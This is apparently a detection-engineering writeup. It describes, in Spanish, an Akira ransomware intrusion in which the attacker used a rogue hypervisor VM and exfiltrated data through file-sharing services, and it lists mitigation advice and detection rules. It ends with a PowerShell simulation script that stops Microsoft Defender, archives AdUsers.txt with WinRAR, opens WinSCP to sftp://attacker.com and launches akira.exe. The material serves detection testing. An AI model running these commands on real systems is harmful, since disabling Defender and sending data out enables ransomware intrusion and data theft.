Akira, LimeWire y el Amargo Sabor de la Exfiltración de Datos
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un afiliado del ransomware Akira obtuvo acceso no autorizado a un hipervisor y creó una nueva máquina virtual para usar como un entorno de preparación encubierto. El atacante se basó en esta VM aislada para evitar el monitoreo de seguridad, preparar datos con WinRAR y exfiltrar archivos a través de la plataforma de intercambio de archivos Easyupload.io. El caso demuestra cómo los actores de amenazas continúan abusando de los servicios legítimos de subida para el robo de datos.
Investigación
La investigación combinó la telemetría de EDR, registros de eventos de Windows y el historial de navegación de Microsoft Edge para reconstruir la intrusión. Los analistas también recuperaron una imagen VHDX de la máquina virtual fraudulenta, la cual reveló que el atacante desactivó Microsoft Defender y configuró la operación de ransomware Akira. La revisión forense de la VM expuso las herramientas exactas, sitios web y flujo de trabajo utilizados durante las fases de preparación y exfiltración.
Mitigación
Las organizaciones deben monitorear la aparición de nuevos puntos finales o instancias de máquinas virtuales no autorizadas en su entorno. Es esencial tener una buena visibilidad sobre el acceso remoto a sistemas críticos como hipervisores y controladores de dominio. También es importante restringir o monitorear de cerca el acceso a servicios conocidos de intercambio de archivos y carga rápida que pueden ser utilizados para la exfiltración.
Respuesta
Si se identifica un acceso no autorizado al hipervisor, aísle inmediatamente el hipervisor afectado y cualquier máquina virtual recién creada. Realice un análisis forense de las imágenes de disco de la VM para determinar el alcance de la preparación y exfiltración de datos. Revise los registros de acceso para rastrear el punto de entrada original y confirmar que no queda acceso persistente del atacante.
Flujo de Ataque
Detections
LOLBAS Finger (via cmdline)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via cmdline)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
View
Akira Ransomware Attack via New Virtual Machine and Data Exfiltration [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary has gained initial access and is looking to escalate the impact. They first enumerate sensitive files by checking for known text files like
AdUsers.txt. To prepare for exfiltration, they useWinRAR.exeto compress the data. They then prepare their exfiltration tool,WinSCP.exe, and finally execute theakira.exeransomware payload. To prevent the EDR/Antivirus from killing the process, they attempt to stop theWindefendservice. This specific sequence of command-line arguments and service status changes is intended to trigger the Akira-specific detection logic. -
Regression Test Script:
# Simulation Script for Akira Ransomware Detection Validation # NOTE: This script requires administrative privileges to stop the Defender service. Write-Host "[+] Starting Akira Ransomware Simulation..." -ForegroundColor Cyan # 1. Simulate Discovery/Enumeration (T1119) Write-Host "[+] Step 1: Simulating file enumeration via Notepad..." Start-Process notepad.exe -ArgumentList "AdUsers.txt" Start-Sleep -Seconds 2 # 2. Simulate Data Archiving (T1560.003) # Note: We assume WinRAR is present or we simulate the command line activity Write-Host "[+] Step 2: Simulating data archival with WinRAR..." Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt" Start-Sleep -Seconds 2 # 3. Simulate Exfiltration Tool Prep (T1105) Write-Host "[+] Step 3: Simulating exfiltration tool execution..." Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com" Start-Sleep -Seconds 2 # 4. Simulate Ransomware Execution (T1204.002) Write-Host "[+] Step 4: Simulating Akira payload execution..." Start-Process "akira.exe" Start-Sleep -Seconds 2 # 5. Simulate Disabling Defender (T1564.006) # This triggers EventID 7036 in the System Log Write-Host "[+] Step 5: Attempting to stop Microsoft Defender..." Stop-Service -Name "Windefend" -Force Write-Host "[+] Simulation Complete. Check SIEM for alerts." -ForegroundColor Green -
Cleanup Commands:
# Cleanup Script Write-Host "[+] Cleaning up simulation artifacts..." -ForegroundColor Cyan # Restart Defender Service Start-Service -Name "Windefend" # Remove simulated files Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue Write-Host "[+] Cleanup complete." -ForegroundColor Green